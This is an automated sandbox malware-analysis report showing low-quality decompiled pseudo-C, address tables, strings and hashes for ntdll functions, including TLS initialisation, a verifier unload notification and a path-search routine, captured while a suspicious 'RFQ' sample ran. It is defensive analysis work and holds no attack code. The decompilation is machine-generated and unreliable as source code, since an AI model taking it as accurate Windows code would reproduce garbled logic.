				_t28 = 1;
				do {
					_t39 = _t43;
					_t43 =  *_t43;
					_t4 = _t39 + 0x18; // 0x400000
					_t19 = E3335DE20(_t32, 1,  *_t4, _t28, 9,  &_v12);
					_v12 = _t19;
					if(_t19 != 0) {
						__eflags =  *0x334437c0 & 0x00000005;
						if(__eflags != 0) {
							_push(_t19);
							_t12 = _t39 + 0x24; // 0x2fe2d64
							E333CE692("minkernel\\ntdll\\ldrtls.c", 0x241, "LdrpInitializeTls", 2, "DLL \"%wZ\" has TLS information at %p\n", _t12);
							_t19 = _v12;
							_t45 = _t45 + 0x1c;
						}
						_push(0);
						_push(0);
						_push( &_v8);
						_t32 = _t19;
						_t17 = E33381796(_t28, _t19, _t39, _t39, _t43, __eflags);
						__eflags = _t17;
						if(__eflags < 0) {
							goto L7;
						}
						 *((short*)(_t39 + 0x3a)) = 0xffff;
					}
				} while (_t43 != 0x33445d8c);
				_t43 = _v8;
				if(_t43 != 0) {
					_t11 = _t43 + 8; // 0x8
					_t41 = _t11;
					__eflags = _t41 - 0x20;
					if(_t41 > 0x20) {
						_t35 =  *0x33445d78; // 0x0
						_t14 = _t43 + 0x27; // 0x27
						_t28 = _t14 >> 5;
						_t25 = L33365D90(_t35 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, _t28 << 2);
						__eflags = _t25;
						if(_t25 != 0) {
							_t43 = _v8;
							L13:
							 *0x33445c90 = _t41;
							_t39 = 0x33445c90;
							 *0x33445c98 = _t28;
							 *0x33445c94 = _t25;
							E33381AD0(0x33445c90, 0, _t43);
							E33381B10(0x33445c90, _t43, 8);
							goto L6;
						}
						_t17 = 0xc0000017;
						goto L7;
					}
					_t25 = 0x33445c88;
					goto L13;
				}
				goto L5;
			}



















                                                                                                                                                                                  0x33381527
                                                                                                                                                                                  0x3338152c
                                                                                                                                                                                  0x3338152d
                                                                                                                                                                                  0x3338152e
                                                                                                                                                                                  0x33381532
                                                                                                                                                                                  0x33381534
                                                                                                                                                                                  0x3338153a
                                                                                                                                                                                  0x33381541
                                                                                                                                                                                  0x3338156f
                                                                                                                                                                                  0x3338156f
                                                                                                                                                                                  0x33381576
                                                                                                                                                                                  0x33381576
                                                                                                                                                                                  0x3338157d
                                                                                                                                                                                  0x3338157d
                                                                                                                                                                                  0x33381582
                                                                                                                                                                                  0x33381586
                                                                                                                                                                                  0x33381586
                                                                                                                                                                                  0x33381545
                                                                                                                                                                                  0x33381546
                                                                                                                                                                                  0x33381549
                                                                                                                                                                                  0x3338154b
                                                                                                                                                                                  0x33381551
                                                                                                                                                                                  0x33381554
                                                                                                                                                                                  0x33381559
                                                                                                                                                                                  0x3338155e
                                                                                                                                                                                  0x33381587
                                                                                                                                                                                  0x3338158e
                                                                                                                                                                                  0x333c1845
                                                                                                                                                                                  0x333c1846
                                                                                                                                                                                  0x333c1860
                                                                                                                                                                                  0x333c1865
                                                                                                                                                                                  0x333c1868
                                                                                                                                                                                  0x333c1868
                                                                                                                                                                                  0x33381594
                                                                                                                                                                                  0x33381596
                                                                                                                                                                                  0x3338159d
                                                                                                                                                                                  0x3338159e
                                                                                                                                                                                  0x333815a0
                                                                                                                                                                                  0x333815a5
                                                                                                                                                                                  0x333815a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333815ae
                                                                                                                                                                                  0x333815ae
                                                                                                                                                                                  0x33381560
                                                                                                                                                                                  0x33381568
                                                                                                                                                                                  0x3338156d
                                                                                                                                                                                  0x333815b4
                                                                                                                                                                                  0x333815b4
                                                                                                                                                                                  0x333815b7
                                                                                                                                                                                  0x333815ba
                                                                                                                                                                                  0x333c1870
                                                                                                                                                                                  0x333c1876
                                                                                                                                                                                  0x333c1879
                                                                                                                                                                                  0x333c1892
                                                                                                                                                                                  0x333c1897
                                                                                                                                                                                  0x333c1899
                                                                                                                                                                                  0x333c18a5
                                                                                                                                                                                  0x333815c5
                                                                                                                                                                                  0x333815c6
                                                                                                                                                                                  0x333815cc
                                                                                                                                                                                  0x333815d4
                                                                                                                                                                                  0x333815da
                                                                                                                                                                                  0x333815df
                                                                                                                                                                                  0x333815e8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333815e8
                                                                                                                                                                                  0x333c189b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c189b
                                                                                                                                                                                  0x333815c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333815c0
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpInitializeTls, xrefs: 333C1851
                                                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 333C184A
                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 333C185B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                                                  • Opcode ID: d09f3e68fcc8eba87409da697487b5640178b1b37dfd09e01c13c71172d73680
                                                                                                                                                                                  • Instruction ID: 2697512e728354e82e6ab8b932699fee6666ae276f5fd2da69b61661faf0193f
                                                                                                                                                                                  • Opcode Fuzzy Hash: d09f3e68fcc8eba87409da697487b5640178b1b37dfd09e01c13c71172d73680
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1631DF71E51304ABFB10DF54CC81B5A77ECEB45795F05C0A9E502BB680EBB0AD4D8790
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333D85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 17%
                                                                                                                                                                                  			E333D85AA(intOrPtr* __ecx) {
				intOrPtr _t9;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t9 =  *[fs:0x30];
				_t23 = __ecx;
				if(( *(_t9 + 0x68) & 0x00000100) == 0 ||  *0x33449231 == 0) {
					return _t9;
				} else {
					E3335FED0(0x33445220);
					if(E333D9174( *((intOrPtr*)(_t23 + 0x18))) == 0) {
						_t20 = _t23;
						if(E333D8E06(_t23) < 0) {
							L9:
							_push(0x33445220);
							return E3335E740(_t20);
						}
						_t22 =  *0x33445240; // 0x0
						while(_t22 != 0x33445240) {
							_t17 =  *((intOrPtr*)(_t22 + 0x1c));
							_t22 =  *_t22;
							if(_t17 != 0) {
								_t20 = _t17;
								 *0x334491e0( *((intOrPtr*)(_t23 + 0x30)),  *((intOrPtr*)(_t23 + 0x18)),  *((intOrPtr*)(_t23 + 0x20)), _t23);
								 *_t17();
							}
						}
						goto L9;
					}
					E3334B910("AVRF: AVrfDllUnloadNotification called for a provider (%p) \n", _t23);
					_pop(_t20);
					asm("int3");
					goto L9;
				}
			}







                                                                                                                                                                                  0x333d85aa
                                                                                                                                                                                  0x333d85ba
                                                                                                                                                                                  0x333d85bc
                                                                                                                                                                                  0x333d8632
                                                                                                                                                                                  0x333d85c7
                                                                                                                                                                                  0x333d85cc
                                                                                                                                                                                  0x333d85db
                                                                                                                                                                                  0x333d85ed
                                                                                                                                                                                  0x333d85f6
                                                                                                                                                                                  0x333d8625
                                                                                                                                                                                  0x333d8625
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d862a
                                                                                                                                                                                  0x333d85f8
                                                                                                                                                                                  0x333d861d
                                                                                                                                                                                  0x333d8600
                                                                                                                                                                                  0x333d8603
                                                                                                                                                                                  0x333d8607
                                                                                                                                                                                  0x333d860d
                                                                                                                                                                                  0x333d8615
                                                                                                                                                                                  0x333d861b
                                                                                                                                                                                  0x333d861b
                                                                                                                                                                                  0x333d8607
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d861d
                                                                                                                                                                                  0x333d85e3
                                                                                                                                                                                  0x333d85e9
                                                                                                                                                                                  0x333d85ea
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d85ea

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 333D85DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                                                  • Opcode ID: 77c028e6ba5fa806bbf557c47ec2e000c61bd33c288c5a9f9fb630b3e772d3b0
                                                                                                                                                                                  • Instruction ID: 08ccfd7370f8ef0417d8cde85b4ed11d98aa4b3f9ab8547e656431aad2bdd09e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 77c028e6ba5fa806bbf557c47ec2e000c61bd33c288c5a9f9fb630b3e772d3b0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01F7379053089BEA215F20DC84F5A7BA5FF41265F4484A9F6416B872CF20B845CE98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333651C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                  			E333651C0(signed int _a4, signed short _a8, signed int _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed short _a28, signed int _a32, signed int* _a36) {
				signed int _v8;
				char _v532;
				void* _v568;
				signed int _v616;
				intOrPtr _v632;
				signed int _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				signed int _v676;
				void* _v680;
				signed int _v692;
				signed int _v696;
				signed short _v700;
				signed int _v704;
				intOrPtr _v708;
				signed int _v712;
				signed short _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed short _v744;
				void* _v748;
				signed int _v752;
				signed short _v756;
				signed short _v760;
				signed int _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v782;
				void* _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v798;
				void* _v800;
				void* _v802;
				void* _v804;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t223;
				signed short _t224;
				signed short* _t226;
				signed short _t229;
				unsigned int _t233;
				signed int _t237;
				signed int _t240;
				signed short _t244;
				signed short _t250;
				signed short _t255;
				signed short _t257;
				signed short _t261;
				signed short _t270;
				signed int _t271;
				signed short _t272;
				signed int _t273;
				unsigned int _t274;
				signed short* _t276;
				signed int _t280;
				unsigned int _t281;
				signed int _t299;
				intOrPtr _t301;
				void* _t305;
				signed short* _t313;
				signed int _t315;
				intOrPtr _t317;
				intOrPtr _t322;
				signed int _t330;
				intOrPtr* _t332;
				void* _t333;
				intOrPtr _t336;
				signed int _t337;
				intOrPtr _t338;
				signed short* _t339;
				signed short _t340;
				signed int _t343;
				signed short _t344;
				signed short _t346;
				short* _t347;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t367;
				signed short _t369;
				signed int _t370;
				signed int _t372;
				signed short _t376;
				signed short _t377;
				signed int _t386;
				signed int _t396;
				signed short* _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t408;
				signed int _t410;
				void* _t411;
				signed int _t412;
				intOrPtr _t413;
				signed short _t418;
				void* _t420;
				signed short _t421;
				signed short _t422;
				short* _t423;
				intOrPtr _t424;
				void* _t425;
				void* _t426;
				signed int _t427;
				signed int _t429;

				_t429 = (_t427 & 0xfffffff8) - 0x2fc;
				_v8 =  *0x3344b370 ^ _t429;
				_t340 = _a8;
				_t389 = _a32;
				_t332 = _a24;
				_v756 = _a16;
				_v728 = _a20;
				_t223 = _a28;
				_v736 = _a36;
				_v744 = _t340;
				_v748 = _t332;
				_v716 = _t223;
				_v720 = _t389;
				_v740 = 0;
				_v732 = 0;
				_v764 = 0x2080000;
				_v760 =  &_v532;
				_t410 = _a12;
				_v712 = _t410;
				if(_t223 != 0) {
					 *_t223 = 0;
				}
				_t418 = _v756;
				if(_v736 != 0) {
					 *_v736 = 0;
					_t418 = _v756;
				}
				if(_t389 != 0) {
					 *_t389 = 0;
				}
				if(_t332 != 0) {
					_t389 = 0;
					 *_t332 = 0;
					 *((intOrPtr*)(_t332 + 4)) = 0;
				}
				if((_a4 & 0xfffffff8) != 0 || _t340 == 0 || _t410 == 0 || _v728 != 0 && _t332 != 0 && _t223 == 0) {
					_t224 = 0xc000000d;
					goto L48;
				} else {
					_t343 =  *_t410 & 0x0000ffff;
					_t226 =  *(_t410 + 4);
					if(_t343 < 2) {
						L15:
						if(_t343 < 4 ||  *_t226 == 0 || _t226[1] != 0x3a) {
							_t389 = 5;
						} else {
							if(_t343 < 6) {
								L127:
								_t389 = 3;
								L21:
								_v724 = _t389;
								if((_a4 & 0x00000002) == 0) {
									__eflags = _t389 - 5;
									if(_t389 == 5) {
										L53:
										__eflags = _a4 & 0x00000001;
										if((_a4 & 0x00000001) != 0) {
											_v696 = 0;
											_t421 = E33369870("true", _t410, _t418, _v728, _t332,  &_v696, 0, _v720, _v736);
											__eflags = _t421;
											if(_t421 >= 0) {
												_t344 = _v716;
												__eflags = _t344;
												if(_t344 != 0) {
													 *_t344 = _v696;
												}
												L50:
												_t421 = 0;
												L45:
												_t229 = _v760;
												if(_t229 != 0 && _t229 !=  &_v532) {
													E33363B90( &_v764);
												}
												_t224 = _t421;
												L48:
												_pop(_t411);
												_pop(_t420);
												_pop(_t333);
												return E33394B50(_t224, _t333, _v8 ^ _t429, _t389, _t411, _t420);
											}
											__eflags = _t421 - 0xc0150008;
											if(_t421 != 0xc0150008) {
												goto L45;
											}
											_t418 = _v756;
										}
										__eflags = _t418;
										if(_t418 == 0) {
											L64:
											_t346 = _v744;
											_t233 =  *_t346 & 0x0000ffff;
											_t422 = _t233;
											_v704 = _t422;
											__eflags = _t233;
											if(_t233 == 0) {
												L77:
												_t389 = _v732 & 0x0000ffff;
												_v752 = _t389;
												_t237 = ( *_t410 & 0x0000ffff) + _t389 + _v740 + 2;
												_t336 = _v748;
												_v704 = _t237;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													_t421 = 0xc0000106;
													goto L45;
												}
												_t347 =  *((intOrPtr*)(_t346 + 4));
												_v748 = _t347;
												_t240 = _t347 + ((_t422 & 0x0000ffff) >> 1) * 2;
												_v712 = _t240;
												__eflags = _t347 - _t240;
												if(_t347 >= _t240) {
													L44:
													_t421 = 0xc000000f;
													goto L45;
												} else {
													goto L79;
												}
												while(1) {
													L79:
													_t423 = _t347;
													__eflags = _t347 - _t240;
													if(_t347 == _t240) {
														goto L82;
													} else {
														goto L80;
													}
													while(1) {
														L80:
														__eflags =  *_t423 - 0x3b;
														if( *_t423 == 0x3b) {
															goto L82;
														}
														_t423 = _t423 + 2;
														__eflags = _t423 - _t240;
														if(_t423 != _t240) {
															continue;
														}
														goto L82;
													}
													L82:
													_t244 = _t423 - _t347 & 0xfffe;
													_v744 = _t244;
													_v732 = _t244 & 0x0000ffff;
													__eflags = _t244;
													if(_t244 != 0) {
														_t360 =  *(_t423 - 2) & 0x0000ffff;
														__eflags = _t360 - 0x5c;
														if(_t360 != 0x5c) {
															__eflags = _t360 - 0x2f;
															if(_t360 != 0x2f) {
																_t244 = _t244 + 2;
																__eflags = _t244;
																_v744 = _t244;
															}
														}
													}
													_t389 = _t389 + ( *_t410 & 0x0000ffff) + (_t244 & 0x0000ffff);
													_t133 = _t389 + 2; // 0x4
													__eflags = ( *(_t429 + 0x12) & 0x0000ffff) - _t133;
													if(( *(_t429 + 0x12) & 0x0000ffff) < _t133) {
														__eflags = _v760 -  &_v532;
														if(_v760 !=  &_v532) {
															goto L163;
														}
														__eflags = _t389 - 0xfffc;
														if(_t389 > 0xfffc) {
															goto L163;
														}
														 *((short*)(_t429 + 0x16)) = _v704 & 0x0000ffff;
														_t250 = E33365D60(_v704 & 0x0000ffff);
														_v764 = _t250;
														__eflags = _t250;
														if(_t250 == 0) {
															L149:
															_t224 = 0xc0000017;
															goto L48;
														}
														goto L87;
													} else {
														L87:
														_v764 = 0;
														L3337DCDF( &_v764, _v748, _v732 & 0x0000ffff);
														_t255 = _v748;
														__eflags = _t255;
														if(_t255 != 0) {
															__eflags = _v732 - _t255;
															if(_v732 != _t255) {
																 *((short*)(_v760 + ((_v764 & 0x0000ffff) >> 1) * 2)) = 0x5c;
																_t144 =  &_v764;
																 *_t144 = _v764 + 2;
																__eflags =  *_t144;
															}
														}
														E3337DD46( &_v764, _t410);
														_t257 = _v756;
														__eflags = _t257;
														if(_t257 != 0) {
															E3337DD46( &_v764, _t257);
														}
														_t389 = _v764 & 0x0000ffff;
														_t150 = _t389 + 2; // 0x4
														__eflags = _t150 - ( *(_t429 + 0x12) & 0x0000ffff);
														if(__eflags > 0) {
															L163:
															_t421 = 0xc00000e5;
															goto L45;
														} else {
															 *((short*)(_v760 + (_t389 >> 1) * 2)) = 0;
															_t389 = 0;
															_t261 = E333831BE( &_v764, 0, __eflags);
															__eflags = _t261;
															if(_t261 != 0) {
																_push(_v736);
																_push( &_v724);
																_push(0);
																_push(_v720);
																_push(_v716);
																_push(_t336);
																L106:
																_push(_v728);
																_push( &_v764);
																_t421 = E33369690();
																__eflags = _t421;
																if(_t421 >= 0) {
																	_t421 = 0;
																}
																goto L45;
															}
															_t240 = _v712;
															__eflags = _t423 - _t240;
															if(_t423 == _t240) {
																_t347 = _t423;
																_v748 = _t423;
															} else {
																_t156 = _t423 + 2; // 0x3a
																_t347 = _t156;
																_v748 = _t347;
															}
															__eflags = _t347 - _t240;
															if(_t347 >= _t240) {
																goto L44;
															} else {
																_t389 = _v752;
																continue;
															}
														}
													}
												}
											}
											_t424 =  *((intOrPtr*)(_t346 + 4));
											_t361 = _t424 + (_t233 >> 1) * 2;
											_t396 = _t361;
											__eflags = _t396 - _t424;
											if(_t396 <= _t424) {
												L70:
												_t270 = _t361 - _t396 >> 0x00000001 & 0x0000ffff;
												__eflags = _t270;
												if(_t270 != 0) {
													_t362 =  *(_t361 - 2) & 0x0000ffff;
													__eflags = _t362 - 0x5c;
													if(_t362 != 0x5c) {
														__eflags = _t362 - 0x2f;
														if(_t362 != 0x2f) {
															_t270 = _t270 + 1;
															__eflags = _t270;
														}
													}
												}
												_t271 = _t270 & 0x0000ffff;
												__eflags = _t271 - _v740;
												if(_t271 <= _v740) {
													_t271 = _v740;
												}
												_t346 = _v744;
												_t272 = _t271 + _t271;
												__eflags = _t272;
												_t422 = _v704;
												_v740 = _t272;
												goto L77;
											} else {
												_t273 = _t396 - 2;
												_t412 = _t361;
												goto L67;
												L67:
												__eflags =  *_t273 - 0x3b;
												if( *_t273 == 0x3b) {
													_t367 = _t412 - _t396 + 0x00000002 >> 0x00000001 & 0x0000ffff;
													_v752 = _t367;
													_t369 = _t367 - 0x00000001 & 0x0000ffff;
													__eflags = _t369;
													if(_t369 != 0) {
														_t337 =  *(_t412 - 2) & 0x0000ffff;
														__eflags = _t337 - 0x5c;
														if(_t337 != 0x5c) {
															__eflags = _t337 - 0x2f;
															if(_t337 != 0x2f) {
																_t369 = _v752 & 0x0000ffff;
															}
														}
													}
													_t370 = _t369 & 0x0000ffff;
													__eflags = _t370 - _v740;
													if(_t370 > _v740) {
														_v740 = _t370;
													}
													_t412 = _t273;
												}
												_t396 = _t396 - 2;
												_t273 = _t273 - 2;
												__eflags = _t396 - _t424;
												if(_t396 > _t424) {
													goto L67;
												} else {
													_v752 = _t412;
													_t410 = _v712;
													_t361 = _v752;
													goto L70;
												}
											}
										}
										_t274 =  *_t410 & 0x0000ffff;
										_v732 =  *_t418 & 0x0000ffff;
										__eflags = _t274;
										if(_t274 == 0) {
											goto L64;
										}
										_t398 =  *(_t410 + 4);
										_t276 =  &(_t398[_t274 >> 1]);
										__eflags = _t276 - _t398;
										if(_t276 > _t398) {
											while(1) {
												_t372 =  *(_t276 - 2) & 0x0000ffff;
												_t276 = _t276 - 2;
												__eflags = _t372 - 0x2e;
												if(_t372 == 0x2e) {
													_v756 = 0;
													_v732 = 0;
													goto L64;
												}
												__eflags = _t372 - 0x5c;
												if(_t372 == 0x5c) {
													goto L64;
												}
												__eflags = _t372 - 0x2f;
												if(_t372 == 0x2f) {
													goto L64;
												}
												__eflags = _t276 - _t398;
												if(_t276 > _t398) {
													continue;
												} else {
													goto L64;
												}
											}
										}
										goto L64;
									}
									L23:
									_t389 = _t410;
									if(L333658B0(2, _t410, 0,  &_v704, 0, 0,  &_v692) < 0) {
										L31:
										if(_t418 == 0) {
											goto L44;
										}
										_t280 =  *_t418 & 0x0000ffff;
										if(_t280 == 0) {
											goto L44;
										}
										_t389 = _t280;
										if((_a4 & 0x00000004) == 0) {
											_t281 =  *_t410 & 0x0000ffff;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L34;
											}
											_t339 =  *(_t410 + 4);
											_t313 =  &(_t339[_t281 >> 1]);
											__eflags = _t313 - _t339;
											if(_t313 <= _t339) {
												goto L34;
											} else {
												goto L142;
											}
											while(1) {
												L142:
												_t386 =  *(_t313 - 2) & 0x0000ffff;
												_t313 = _t313 - 2;
												__eflags = _t386 - 0x5c;
												if(_t386 == 0x5c) {
													goto L34;
												}
												__eflags = _t386 - 0x2f;
												if(_t386 == 0x2f) {
													goto L34;
												}
												__eflags = _t386 - 0x2e;
												if(_t386 == 0x2e) {
													goto L44;
												}
												__eflags = _t313 - _t339;
												if(_t313 > _t339) {
													continue;
												}
												goto L34;
											}
										}
										L34:
										_t376 = ( *_t410 & 0x0000ffff) + 2 + _t389;
										if(_t376 > 0xfffe) {
											_t421 = 0xc0000106;
											goto L45;
										}
										if(_t376 > ( *(_t429 + 0x12) & 0x0000ffff)) {
											 *((short*)(_t429 + 0x16)) = _t376 & 0x0000ffff;
											_t377 = E33365D60(_t376 & 0x0000ffff);
											_v764 = _t377;
											__eflags = _t377;
											if(_t377 != 0) {
												goto L37;
											}
											goto L149;
										} else {
											_t377 = _v760;
											L37:
											E333988C0(_t377,  *(_t410 + 4),  *_t410 & 0x0000ffff);
											E333988C0(_v760 + (( *_t410 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t418 + 4)),  *_t418 & 0x0000ffff);
											_t429 = _t429 + 0x18;
											 *((short*)(_v760 + (( *_t418 & 0x0000ffff) + ( *_t410 & 0x0000ffff) >> 1) * 2)) = 0;
											_v764 =  *_t418 +  *_t410;
											_t389 =  &_v764;
											if(L333658B0(2,  &_v764, 0,  &_v712, 0, 0,  &_v676) < 0) {
												goto L44;
											}
											_t299 = _v676;
											_t413 = _v708;
											if(_t299 != 0) {
												_v712 = _t299;
												_v708 = _v672;
												_t301 = _v668;
											} else {
												_t301 = 0;
											}
											_v632 = _t301;
											 *((intOrPtr*)(_t429 + 0x98)) =  &_v712;
											_push(_t429 + 0xd0);
											 *(_t429 + 0x94) = 0x18;
											_push(_t429 + 0x94);
											 *((intOrPtr*)(_t429 + 0xa4)) = 0x40;
											 *(_t429 + 0xa8) = 0;
											_v616 = 0;
											_t305 = L33392D80();
											_t338 = _v672;
											_t425 = _t305;
											if(_t338 != 0) {
												__eflags = 0xffffffffffffffff;
												asm("lock xadd [ebx], ecx");
												if(0xffffffffffffffff == 0) {
													_push( *((intOrPtr*)(_t338 + 4)));
													E33392A80();
													E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t338);
												}
											}
											E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t413);
											if(_t425 >= 0 || _t425 == 0xc0000043 || _t425 == 0xc0000022) {
												_push(_v736);
												_push( &_v724);
												_push(0);
												_push(_v720);
												_push(_v716);
												_push(_v748);
												goto L106;
											} else {
												goto L44;
											}
										}
									}
									_v744 = _v700;
									_t315 = _v692;
									if(_t315 != 0) {
										_v704 = _t315;
										_v700 =  *(_t429 + 0x5c);
										_t317 =  *((intOrPtr*)(_t429 + 0x60));
									} else {
										_t317 = 0;
									}
									 *((intOrPtr*)(_t429 + 0x7c)) = _t317;
									 *((intOrPtr*)(_t429 + 0x80)) =  &_v704;
									_push(_t429 + 0xa8);
									_v660 = 0x18;
									_push( &_v660);
									 *((intOrPtr*)(_t429 + 0x8c)) = 0x40;
									 *(_t429 + 0x90) = 0;
									 *(_t429 + 0x94) = 0;
									_t426 = L33392D80();
									_t322 =  *((intOrPtr*)(_t429 + 0x64));
									if(_t322 != 0) {
										__eflags = 0xffffffffffffffff;
										asm("lock xadd [eax], ecx");
										if(0xffffffffffffffff == 0) {
											_push( *((intOrPtr*)(_t322 + 4)));
											E33392A80();
											E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t429 + 0x64)));
										}
									}
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v744);
									if(_t426 >= 0 || _t426 == 0xc0000043 || _t426 == 0xc0000022) {
										_t421 = E33369690(_t410, _v728, _t332, _v716, _v720, 0,  &_v724, _v736);
										__eflags = _t421;
										if(_t421 < 0) {
											goto L45;
										}
										goto L50;
									} else {
										_t418 = _v756;
										goto L31;
									}
								}
								if(_t389 == 5) {
									__eflags = _t343 - 4;
									if(_t343 < 4) {
										goto L53;
									}
									__eflags =  *_t226 - 0x2e;
									if( *_t226 == 0x2e) {
										_t389 = _t226[1] & 0x0000ffff;
										__eflags = _t389 - 0x5c;
										if(_t389 == 0x5c) {
											L134:
											_v724 = 0;
											goto L23;
										}
										__eflags = _t389 - 0x2f;
										if(_t389 == 0x2f) {
											goto L134;
										}
										__eflags = _t389 - 0x2e;
										if(_t389 != 0x2e) {
											goto L53;
										}
										__eflags = _t343 - 6;
										if(_t343 < 6) {
											goto L53;
										}
										_t330 = _t226[2] & 0x0000ffff;
										__eflags = _t330 - 0x5c;
										if(_t330 == 0x5c) {
											goto L134;
										}
										__eflags = _t330 - 0x2f;
										if(_t330 != 0x2f) {
											goto L53;
										}
										goto L134;
									}
									goto L53;
								}
								goto L23;
							}
							_t400 = _t226[2] & 0x0000ffff;
							if(_t400 != 0x5c) {
								__eflags = _t400 - 0x2f;
								if(_t400 == 0x2f) {
									goto L20;
								}
								goto L127;
							}
							L20:
							_t389 = 2;
						}
						goto L21;
					}
					_t401 =  *_t226 & 0x0000ffff;
					if(_t401 == 0x5c || _t401 == 0x2f) {
						__eflags = _t343 - 4;
						if(_t343 < 4) {
							L125:
							_t389 = 4;
							goto L21;
						}
						_t402 = _t226[1] & 0x0000ffff;
						__eflags = _t402 - 0x5c;
						if(_t402 == 0x5c) {
							L116:
							__eflags = _t343 - 6;
							if(_t343 < 6) {
								L124:
								_t389 = 1;
								goto L21;
							}
							_t403 = _t226[2] & 0x0000ffff;
							__eflags = _t403 - 0x2e;
							if(_t403 == 0x2e) {
								L119:
								__eflags = _t343 - 8;
								if(_t343 < 8) {
									L123:
									__eflags = _t343 - 6;
									_t389 = ((0 | _t343 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
									goto L21;
								}
								_t408 = _t226[3] & 0x0000ffff;
								__eflags = _t408 - 0x5c;
								if(_t408 == 0x5c) {
									L122:
									_t389 = 6;
									goto L21;
								}
								__eflags = _t408 - 0x2f;
								if(_t408 != 0x2f) {
									goto L123;
								}
								goto L122;
							}
							__eflags = _t403 - 0x3f;
							if(_t403 != 0x3f) {
								goto L124;
							}
							goto L119;
						}
						__eflags = _t402 - 0x2f;
						if(_t402 != 0x2f) {
							goto L125;
						}
						goto L116;
					} else {
						goto L15;
					}
				}
			}























































































































                                                                                                                                                                                  0x333651c8
                                                                                                                                                                                  0x333651d5
                                                                                                                                                                                  0x333651e2
                                                                                                                                                                                  0x333651e5
                                                                                                                                                                                  0x333651e8
                                                                                                                                                                                  0x333651ee
                                                                                                                                                                                  0x333651f5
                                                                                                                                                                                  0x333651f9
                                                                                                                                                                                  0x333651fc
                                                                                                                                                                                  0x33365207
                                                                                                                                                                                  0x3336520b
                                                                                                                                                                                  0x3336520f
                                                                                                                                                                                  0x33365213
                                                                                                                                                                                  0x33365217
                                                                                                                                                                                  0x3336521f
                                                                                                                                                                                  0x33365227
                                                                                                                                                                                  0x3336522f
                                                                                                                                                                                  0x33365233
                                                                                                                                                                                  0x33365236
                                                                                                                                                                                  0x3336523c
                                                                                                                                                                                  0x3336523e
                                                                                                                                                                                  0x3336523e
                                                                                                                                                                                  0x33365249
